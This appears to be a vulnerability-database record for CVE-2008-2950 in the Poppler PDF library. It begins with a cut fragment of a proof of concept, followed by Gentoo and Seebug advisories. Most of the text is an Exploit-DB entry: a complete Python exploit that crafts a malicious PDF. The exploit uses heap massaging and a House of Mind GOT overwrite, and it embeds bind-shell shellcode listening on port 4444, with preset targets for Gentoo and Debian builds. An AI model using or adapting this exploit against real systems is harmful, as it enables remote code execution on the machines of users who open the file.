) \n#got: address of the got entry to change \n#chinesse massage \nbase,got,massage1,massage2,massage3 = targets[sys.argv[1]] \nprint expl.make(base,got,(massage1,massage2,massage3)) \n \n \n#thnks A \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/68074/poppler-poc.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:25", "bulletinFamily": "unix", "description": "### Background\n\nPoppler is a cross-platform PDF rendering library originally based on Xpdf. \n\n### Description\n\nFelipe Andres Manzano reported a memory management issue in the Page class constructor/destructor. \n\n### Impact\n\nA remote attacker could entice a user to open a specially crafted PDF file with a Poppler-based PDF viewer such as Gentoo's Xpdf, Epdfview, or Evince, potentially resulting in the execution of arbitrary code with the privileges of the user running the application. \n\n### Workaround\n\nThere is no known workaround at this time. 
\n\n### Resolution\n\nAll poppler users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-text/poppler-0.6.3-r1\"", "modified": "2008-07-08T00:00:00", "published": "2008-07-08T00:00:00", "id": "GLSA-200807-04", "href": "https://security.gentoo.org/glsa/200807-04", "type": "gentoo", "title": "Poppler: User-assisted execution of arbitrary code", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "seebug": [{"lastseen": "2017-11-19T21:37:11", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 30107\r\nCVE ID: CVE-2008-2950\r\nCNCVE ID: CNCVE-20082950\r\n \r\nPoppler is a PDF rendering library.\r\nThe Poppler PDF rendering library contains a memory management error; a remote attacker can exploit the vulnerability to execute arbitrary code with the privileges of the application.\r\nThe vulnerability lies in the Page class constructor/destructor: under specific conditions the pageWidgets object is not correctly initialized in the Page constructor, and during the subsequent destruction it is deleted directly without checking whether it was initialized. A specially crafted PDF file can cause arbitrary memory to be allocated and trigger this vulnerability, which may lead to arbitrary code execution with the privileges of the application.\r\n\n\npoppler 0.8.4\n Upgrade to the latest version:\r\n<a href=http://poppler.freedesktop.org/ target=_blank>http://poppler.freedesktop.org/</a>", "modified": "2008-07-08T00:00:00", "published": "2008-07-08T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-3570", "id": "SSV:3570", "title": "Poppler PDF Rendering Library Page Class Remote Code Execution Vulnerability", 
"type": "seebug", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": ""}], "exploitdb": [{"lastseen": "2016-01-31T23:04:20", "bulletinFamily": "exploit", "description": "Poppler <= 0.8.4 libpoppler uninitialized pointer Code Execution PoC. CVE-2008-2950. Local exploit for linux platform", "modified": "2008-07-08T00:00:00", "published": "2008-07-08T00:00:00", "id": "EDB-ID:6032", "href": "https://www.exploit-db.com/exploits/6032/", "type": "exploitdb", "title": "Poppler <= 0.8.4 libpoppler uninitialized pointer Code Execution PoC", "sourceData": "##########################################################################\n#### Felipe Andres Manzano * fmanzano@fceia.unr.edu.ar ####\n#### updates in http://felipe.andres.manzano.googlepages.com/home ####\n##########################################################################\n'''\n\n\nSumary:\n=======\n\nThe libpoppler pdf rendering library, can free uninitialized pointers,\nleading to arbitrary code execution. This vulnerability results from\nmemory management bugs in the Page class constructor/destructor.\n\n\nTechnical Description - Exploit/Concept Code:\n=============================================\n\nTests were performed using libpoppler util pdftotext taken from\ngit://git.freedesktop.org/git/poppler/poppler.\nOther version where tried succesfully (the ones shiped with\ndebian/gentoo).\n\nIn the initialization of a Page object and under certain conditions a\nmember object skips initialization, but then is eventualy deleted. This\ncan be conducted to the situation in which an arbitrary pointer is\npassed to the libc free and so the it gets apropiate for the malloc\nmaleficarum to enter the scene.\n\nLook at the Page class constructor on Page.cc:231. 
First at the begining\nof the function the member object pageWidgets isnt initialized then it\ntries to check if the type of the annotations proposed on the pdf file\nar correct; if not it bails out to the label err2. Note that is some\nincorcondance on the type of the anotation arise the member variable\npageWidgets is never initialized! \n\nPage::Page(XRef *xrefA, int numA, Dict *pageDict, PageAttrs *attrsA, Form *form) {\n Object tmp;\n[...]\n // annotations\n pageDict->lookupNF(\"Annots\", &annots);\n if (!(annots.isRef() || annots.isArray() || annots.isNull())) {\n error(-1, \"Page annotations object (page %d) is wrong type (%s)\",\n\t num, annots.getTypeName());\n annots.free();\n goto err2;\n }\n\n // forms\n pageWidgets = new FormPageWidgets(xrefA, this->getAnnots(&tmp),num,form);\n tmp.free();\n[...]\n err2:\n annots.initNull();\n err1:\n contents.initNull();\n ok = gFalse;\n}\n\nBut in the Page class destructor, Page.cc:309, pageWidgets is deleted\nwithout any consideration. The Page destructor is inmediatelly called\nafter the erroneous Page construction.\n\nPage::~Page() {\n delete pageWidgets;\n delete attrs;\n annots.free();\n contents.free();\n}\n\n\nIt is worth mentioning that the pdf rendering scenario is friendly with\nthe heap massage technics because you will find lots of ways to allocate\nor allocate/free memory in the already probided functionality. In the\nPOC I have used repetidely the 'name' of the fields of a pdf dictionary\nto allocate memory. Each name allocates up to 127bytes and apparently\nthere is no limit in the number of fields. 
\n\n\nThe following excerpt is a sample verification of the existence of\nthe problem :\n\nlocalhost expl-poppler # python poppler-exploit-rc8.py gentoo-pdftotext >test.pdf \nlocalhost expl-poppler # pdftotext test.pdf \nError: PDF file is damaged - attempting to reconstruct xref table...\nError: Annotation rectangle is wrong type\nError: Bad bounding box for annotation\nError: Bad bounding box for annotation\nError: Bad bounding box for annotation\nError: Bad bounding box for annotation\nError: Bad bounding box for annotation\nError: Page annotations object (page 3) is wrong type (integer)\nError: Page count in top-level pages object is incorrect\nError: Couldnt read page catalog\nTrace/breakpoint trap\n\n:)\n\n\nFurther research should be done to accomodate the heap for other applications like evince:\nlocalhost expl-poppler # evince test.pdf \n\n(evince:8912): GnomeUI-WARNING **: While connecting to session manager:\nAuthentication Rejected, reason : None of the authentication protocols specified are supported and host-based authentication failed.\n\n** (evince:8912): WARNING **: Service registration failed.\n\n** (evince:8912): WARNING **: Did not receive a reply. Possible causes include: the remote application did not send a reply, the message bus security policy blocked the reply, the reply timeout expired, or the network connection was broken.\nError: PDF file is damaged - attempting to reconstruct xref table...\nError: Annotation rectangle is wrong type\nError: Bad bounding box for annotation\nError: Bad bounding box for annotation\nError: Bad bounding box for annotation\nError: Bad bounding box for annotation\nError: Bad bounding box for annotation\nError: Page annotations object (page 3) is wrong type (integer)\n*** glibc detected *** evince: munmap_chunk(): invalid pointer: 0x08100468 ***\n\nNote that 0x08100468 is still a provided pointer. But in this try some\nmalloc structure like _heap_info (see. house of mind) is not correctly\naligned any more. 
Maybe evince-thumbnailer which is (probably\nmonothreaded) is an easier target.\n\n\nPatch\n=====\n\ndiff --git a/poppler/Page.cc b/poppler/Page.cc\nindex b28a3ee..72a706b 100644\n--- a/poppler/Page.cc\n+++ b/poppler/Page.cc\n@@ -230,7 +230,7 @@ GBool PageAttrs::readBox(Dict *dict, char *key, PDFRectangle *box) {\n \n Page::Page(XRef *xrefA, int numA, Dict *pageDict, PageAttrs *attrsA, Form *form) {\n Object tmp;\n-\t\n+ pageWidgets =\tNULL; //Security fix\n ok = gTrue;\n xref = xrefA;\n num = numA;\n\n\nPOC:\n===\n\nWritten in pyploit. It can be used 2 ways , one selecting a preconfigured\ntarget like *gentoo-pdftotext* or the other in which you could pass some\nmalloc/free execution trace moddifing parameters. \n\n'''\n\nimport struct\nimport struct\nimport math\nimport os\n\nimport sys\n\n## print \"%.400f\"%d wont work :( ... so a quick double printing class \nclass Doubles:\n def __init__(self, precision=400):\n self.precision=precision\n\n def pdficateint(self,i1,i2):\n s = struct.pack(\"@L\",i1) + struct.pack(\"@L\",i2)\n return self.pdficatestr(s)\n\n def pdficate(self,s):\n rslt = \" \"\n for pos in range (0,len(s)/8):\n rslt+=self.pdficatestr(s[(pos*8):(pos*8)+8])+\" \" \n return rslt;\n\n def pdficatestr(self, s):\n d = struct.unpack(\"d\",s)[0]\n rslt=\" \"\n if(d<0.0):\n rslt+=\"-\"\n d=-d\n rslt+=\"%d.\"%int(math.floor(d))\n myd=math.floor(d)\n scale=0.1\n\tnines=0\n for p in range(1,self.precision):\n for i in range(1,10):\n\t if (myd+scale*i) > d:\n\t i-=1\n\t break\n if i==9:\n\t\tif nines>6:\n\t\t return rslt\n\t\telse:\n\t\t nines+=1\n\t else:\n\t\tnines=0\n rslt+=(\"%02d\"%i)[1]\n myd+=scale* i\n scale=scale*0.1\n\treturn rslt\n\n##From Malloc maleficarum\n##http://packetstormsecurity.org/papers/attack/MallocMaleficarum.txt\nclass HouseOfMind:\n\n HEAP_MAX_SIZE=(1024*1024) \n JMP='\\xeb'\n NOP='\\x90'\n PAD='\\x00'\n PREV_INUSE=0x1\n IS_MMAPPED=0x2\n NON_MAIN_ARENA=0x4\n def __init__(self, base, where, payload, entrypoint):\n self.base=base\n 
self.where=where-0xc\n self.heap_info = (base+self.HEAP_MAX_SIZE-1)& ~(self.HEAP_MAX_SIZE-1)\n self.payload=payload\n self.entrypoint=entrypoint\n self.chunkaddress=0\n if (self.entrypoint > 0xff - 8):\n \tthrow \n \n## lendian, 32bit only\n## See The Malloc Maleficarum / House of Mind\n def mind(self):\n rslt = \"\"\n #first we add padding to reach the next Heap border\n rslt+=self.PAD*(self.heap_info-self.base)\n\n #now we add a _heap_info pinting to a malloc_state of our own\n #and dictating a generous size for this *heap*\t\n ##arena.c:59 //struct _heap_info\n rslt += struct.pack(\"<L\", self.heap_info + 16) # Arena for this heap.\n rslt += struct.pack(\"<L\", 0x0000000) # Previous heap. (BUG: Don't know what M does with this)\n rslt += struct.pack(\"<L\", 0x7000000) # Current size in bytes.\n rslt += struct.pack(\"<L\", 0x7000000) # Size in bytes that has been mprotected PROT_READ|PROT_WRITE\n #here arena.c suggest some padding. We just don't do it.\n\n\n #now we add the malloc_state of our own\n ##malloc.c:2317 //struct malloc_state\n rslt += struct.pack(\"<L\", 0x00000000)\t# mutex for serializing access * 0 -> unlocked.\n rslt += struct.pack(\"<L\", 0x000ffff)\t# Flags * We need NONCONTIGUOUS_BIT to be on for passing\n \t\t\t\t\t# condition on malloc.c:@@@@@\n\n #Note: We assume not Thread's stats#\n \n rslt += struct.pack(\"<L\", 0x00000000)*10 \t#Fastbins * We don use them.\n rslt += struct.pack(\"<L\", 0x00000000)\t\t#Base of the topmost chunk--not otherwise kept in a bin\n \t\t\t\t\t\t#We need it to be different to our chunk pointer for \n \t\t\t\t\t\t#passing condition on malloc.c:@@@@, 0 is safe enough\n rslt += struct.pack(\"<L\", 0x00000000)\t#The remainder from the most recent split of a small request\n\n #Here it come the bins\n ##The first one is the Unsorted bin! 
\n ##Free will write the *chunk* to the containing address +0xc; so it\n ##shout point to the GOT pointer to 'overload' -0xc\n rslt += struct.pack(\"<L\", self.where);\n \n rslt += struct.pack(\"<L\", 0x0000000)* 253\t#All the other unused bins go to 0 * ~\n rslt += struct.pack(\"<L\", 0x00000000)*4\t\t#Bitmap of bins\n\n rslt += struct.pack(\"<L\", 0x00000000)\t#Linked list next malloc_state\n \n ##Memory allocated from the system in this arena.\n rslt += struct.pack(\"<L\", 0x70000000)\t#system_mem * Need to be big enough for passing the\n \t\t\t\t\t#condition on malloc:@@@@\n rslt += struct.pack(\"<L\", 0x00000000)\t#max_system_mem ?? \n\n #needed for chunk aligment\n rslt += self.PAD*4\n\n#CHUNKS\n# An allocated chunk looks like this:\n#\n# chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n# | Size of previous chunk, if allocated | |\n# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n# | Size of chunk, in bytes |M|P|\n# mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n# | User data starts here... .\n# . .\n# . (malloc_usable_size() bytes) .\n# . |\n#nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n# | Size of chunk |\n# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n\n\n #chunk 0 There isn't a single reason for this to exist * wabaaaaaaaaaa!\n# rslt += struct.pack(\"<L\", 16)\t#Size of previous chunk * UNUSED\n# rslt += struct.pack(\"<L\", 64) \t#Size of chunk, in bytes. 
No flags\n# rslt += self.PAD*(64-8)\n\n #chunk 1 THE CHAMP\n rslt += \"\\x40\"+self.JMP+struct.pack(\"B\",5+self.entrypoint)+self.PAD #Size of previous chunk *DOESN'T MATTER!\n rslt += struct.pack(\"<L\",8+len(self.payload)|self.PREV_INUSE|self.NON_MAIN_ARENA) # Size of this chunk\n \t\t\t\t\t\t\t\t #TODO: Explain flags, link code\n \n ##Save the chunk1 address \n self.chunkaddress= self.base + len(rslt)\n rslt += self.payload\t#payload (payload[entrypoint] should contain shellcode)!\n\n #chunk 2 THE LAST?\n rslt += struct.pack(\"<L\",8+len(self.payload))\t#Size of previous chunk\n \t\t\t\t\t\t#TODO: link where it is checked\n \n rslt += struct.pack(\"<L\",64|self.PREV_INUSE|self.NON_MAIN_ARENA) #Size of this chunk \n \t\t\t\t\t\t\t\t #Neds to be greater than 2 * SIZE_SZ,\n \t\t\t\t\t\t\t\t #TODO: Explain flags, link code\n\n rslt += self.PAD*(64-8)\n\n #chunk 3 THE LAST!\n rslt += struct.pack(\"<L\",64)\t\t#Size of previous chunk\n rslt += struct.pack(\"<L\",self.PREV_INUSE) #Size of this chunk * Here we need just the PREV_INUSE bit set\n return rslt\n #no need no payload\n\n#For constructing a minimal pdf file\nclass PDFObject:\n def __init__(self,toks):\n self.toks=toks\n self.n=0\n self.v=0\n \n def __str__(self):\n s=\"%d %d obj\\n\"%(self.n,self.v)\n for t in self.toks:\n s+=t.__str__()\n s+=\"\\nendobj\\n\" \n return s\n\n\nclass PDFDict():\n def __init__(self):\n self.dict = []\t\n\n def add(self,name,obj):\n self.dict.append((name,obj))\n\n def __str__(self):\n s=\"<<\"\n for name,obj in self.dict:\n s+=\"/%s %s\\n\"%(name,obj)\n s+=\">>\"\n return s\t\n\nclass PDFName():\n def __init__(self,s):\n self.s=s\n def __str__(self):\n return \"/%s\"%self.s\n\nclass PDFString():\n def __init__(self,s):\n self.s=s\n def __str__(self):\n return \"(%s)\"%self.s\n\nclass PDFRef():\n def __init__(self,obj):\n self.obj=obj\n def __str__(self):\n return \"%d %d R\"%(self.obj.n,self.obj.v)\n\n\nclass PDFDoc():\n def __init__(self):\n self.objs=[]\n \t\n def 
add(self,obj):\n obj.v=0\n obj.n=1+len(self.objs)\n self.objs.append(obj)\n\n def _header(self):\n return \"%PDF-1.5\\n\"\n \n def __str__(self):\n doc1 = \"%PDF-1.5\\n\"\n xref = {}\n for obj in self.objs:\n xref[obj.n] = len(doc1)\n doc1=doc1+obj.__str__()\n posxref=len(doc1)\n doc1+=\"xref\\n\"\n doc1+=\"0 %d\\n\"%len(self.objs)\n doc1+=\"0000000000 65535 f\\n\"\n for xr in xref.keys():\n doc1+= \"%010d %05d n\\n\"%(xref[xr],0)\n doc1+=\"trailer\\n\"\n trailer = PDFDict()\n trailer.add(\"Size\",len(self.objs))\n trailer.add(\"Root\",\"2 0 R\")\n doc1+=trailer.__str__()\n doc1+=\"\\nstartxref\\n%d\\n\"%posxref\t\n doc1+=\"%%EOF\\n\\n\" \t\n\n return doc1\n\n#The ... \"POC\"\nclass PopplerExpl:\n\n def __init__(self,shellcode):\n\tself.shellcode=shellcode\n self.d = Doubles()\n\n#this wraps the shellcode in an encoding supported by 'doubles'\n def wrap(self,scode,where):\n\twrapscode = '\\xb8' + struct.pack(\"<L\",where)+\"\\x90\"*3 \t#movl where, %eax;nop;nop;nop\n\tfor c in scode:\n\t wrapscode += \"\\xc6\\x00%c\\x40\"%c \t\t\t#movb $c, (%eax); inc %eax\n \tif (len(scode)%2!=0):\n\t wrapscode += \"\\xc6\\x00\\xcc\\x40\"\t\t \t#movb $0xcc, (%eax); inc %eax\n\twrapscode += \"\\xb8\" + struct.pack(\"<L\",where)+\"\\x90\"*3\t#movl where, %eax;nop;nop;nop\n\twrapscode += \"\\x50\\xc3\"\t\t\t\t\t#push %eax;ret\n\treturn wrapscode + '\\x00'*(1000-len(wrapscode))\t\t#padding to a supported size\n\n def make(self,base,got,massage=None):\n #here we generate the house of mind thingy\n\t#The House Of Mind instance.\n\t#Te first word es passed tu a gfree so we put 0 so we ignore that free.\n hm = HouseOfMind(base, got, \"\\x00\"*16+ self.wrap(self.shellcode,base), 16)\n mind = hm.mind()\n\n doc = PDFDoc()\n doc.add(PDFObject([\"<</Length 3>>\\nstream...\\nendstream\\n\"]))\n catalog = PDFDict()\n catalog.add(\"Type\", PDFName(\"Catalog\"))\n catalog.add(\"Outlines\", \"3 0 R\")\n catalog.add(\"Pages\", \"4 0 R\")\n catalog.add(\"AcroForm\", \"<</Fields [ 7 0 R ]>>\")\n\n 
#for i in range(0,1000):\n # catalog.add( \"C\"*82 + \"%05d\"%i, 0)\n\n outlines = PDFDict()\n outlines.add(\"Type\", PDFName(\"Outlines\"))\n outlines.add(\"Count\",0)\n\n pages = PDFDict()\n pages.add(\"Type\", PDFName(\"Pages\"))\n pages.add(\"Kids\",\"[ 8 0 R 6 0 R 5 0 R ]\")\n pages.add(\"Count\",\"3\")\n\n doc.add(PDFObject([catalog]))\n doc.add(PDFObject([outlines]))\n doc.add(PDFObject([pages]))\n\n page1 = PDFDict()\n page1.add(\"Type\", PDFName(\"Page\"))\n page1.add(\"Parent\", \"4 0 R\")\n page1.add(\"MediaBox\",\"[ 0 0 612 792 ]\")\n page1.add(\"Contents\", \"1 0 R\")\n page1.add(\"Resources\", \"<< /ProcSet 6 0 R >>\")\n page1.add(\"Annots\", \"0\")\n \n\t#malloc-fill-free lots of chunks of the size then used by Page class(88) \n for pagesize in range(88,126):\n\t payload = (\"\".join([\"#%02x\"%ord(struct.pack(\"@L\",hm.chunkaddress)[i]) for i in range (0,4)]))*19\n\t payload += \"B\"*(pagesize-(len(payload)/3)) \n\t for i in range(0,10):\n \tpage1.add(payload, 0)\n\n doc.add(PDFObject([page1]))\n\n page1 = PDFDict()\n page1.add(\"Type\", PDFName(\"Page\"))\n page1.add(\"Parent\", \"4 0 R\")\n page1.add(\"MediaBox\",\"[ 0 0 612 792 ]\")\n page1.add(\"Contents\", \"1 0 R\")\n page1.add(\"Resources\", \"<< /ProcSet 6 0 R >>\")\n page1.add(\"Annots\", \"[7 0 R 7 0 R 7 0 R 7 0 R]\")\n\n #massage session 1\n size=127\n for i in range(0,massage[0]):\n page1.add( \"A\"*(size-5)+(\"%05d\"%(i)), \"B\"*size)\n\n doc.add(PDFObject([page1]))\n annots = PDFDict()\n annots.add(\"Subtype\",\"/Text\")\n\n annots.add(\"BS\", \"<</D [ \"+\n\t\"0 \"*massage[1] + \n self.d.pdficate(mind)+\n #more massage>?\n \"0.0 \"*massage[2] + \" ]>>\")\n\n annots.add(\"FT\", \"/Tx\")\n doc.add(PDFObject([annots]))\n\n page1 = PDFDict()\n page1.add(\"Type\", PDFName(\"Page\"))\n page1.add(\"Parent\", \"4 0 R\")\n page1.add(\"MediaBox\",\"[ 0 0 612 792 ]\")\n page1.add(\"Contents\", \"1 0 R\")\n page1.add(\"Resources\", \"<< /ProcSet 6 0 R >>\")\n page1.add(\"Annots\", \"[7 0 R]\")\n 
doc.add(PDFObject([page1]))\n doc.add(PDFObject([\"<<>>\"]))\n doc.add(PDFObject([\"[ /PDF ]\"]))\n return doc.__str__()\n\n\n##Main\n## Not every shellcode will work by now\n## Only the ones that taken by 8bytes form an ieee754 double presicion float\n## with an exponent not too positive ... :)\n\n## linux_ia32_bind - LPORT=4444 Size=84 Encoder=None http://metasploit.com \nscode = \"\\x31\\xdb\\x53\\x43\\x53\\x6a\\x02\\x6a\\x66\\x58\\x99\\x89\\xe1\\xcd\\x80\\x96\"\nscode += \"\\x43\\x52\\x66\\x68\\x11\\x5c\\x66\\x53\\x89\\xe1\\x6a\\x66\\x58\\x50\\x51\\x56\"\nscode += \"\\x89\\xe1\\xcd\\x80\\xb0\\x66\\xd1\\xe3\\xcd\\x80\\x52\\x52\\x56\\x43\\x89\\xe1\"\nscode += \"\\xb0\\x66\\xcd\\x80\\x93\\x6a\\x02\\x59\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\xb0\"\nscode += \"\\x0b\\x52\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x52\\x53\"\nscode += \"\\x89\\xe1\\xcd\\x80\"\n\n#expl = PopplerExpl( ('\\xcc'+'\\x90')*((160-16)/2))\nexpl = PopplerExpl(scode)\n\ntargets = {\n \"gentoo-pdftotext\":(0x08100000, 0x804c014, 1863, 20, 400),\n \"debian4-pdftotext\":(0x08100000, 0x804bb18, 1879, 33, 400),\n \"gentoo-evince-thumbnailer\": (0x8100000, 0x080712c4, 907, 34, 200),\n\n}\n\nif len( sys.argv )==1:\n print \"Comments -> fmanzano@fceia.unr.edu.ar\"\n print \"Usage 1:\"\n print \"\t%s \"%sys.argv[0], targets.keys()\n print \"Usage 2:\"\n print \"\t%s massage1 massage2 massage3 base got\"%sys.argv[0]\n print \"\tThe idea here is to align the _heap_info struct that commences with 0x08?00010 \"\n print \"\tto the address 0x8?0000. For this pourpose move massage1/2/3. \"\n print \"\tTHIS STUPIDLY SIMPLE METHOD WOULD WORK FOR VERY FEW APPS !\"\n print \"\tbase is the 1024*1024 bytes aligned address to which we are trying to align everything\" \n print \"\tgot is the addres of the got where the thing is going to write the shellcode address\"\n print \"\tBTW by now the shellcode is nop;int 3;nop...grooovy!.. 
NOT\"\nelif len( sys.argv )>2:\n print expl.make(int(sys.argv[4][2:],16), int(sys.argv[5][2:],16), (int(sys.argv[1]),int(sys.argv[2]),int(sys.argv[3])))\nelse:\n #base: the expected heap limit (08100000,08200000,....08f00000... )\n #got: address of the got entry to change \n #chinesse massage\n base,got,massage1,massage2,massage3 = targets[sys.argv[1]]\n print expl.make(base,got,(massage1,massage2,massage3))\n\n# milw0rm.com [2008-07-08]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/6032/"}]}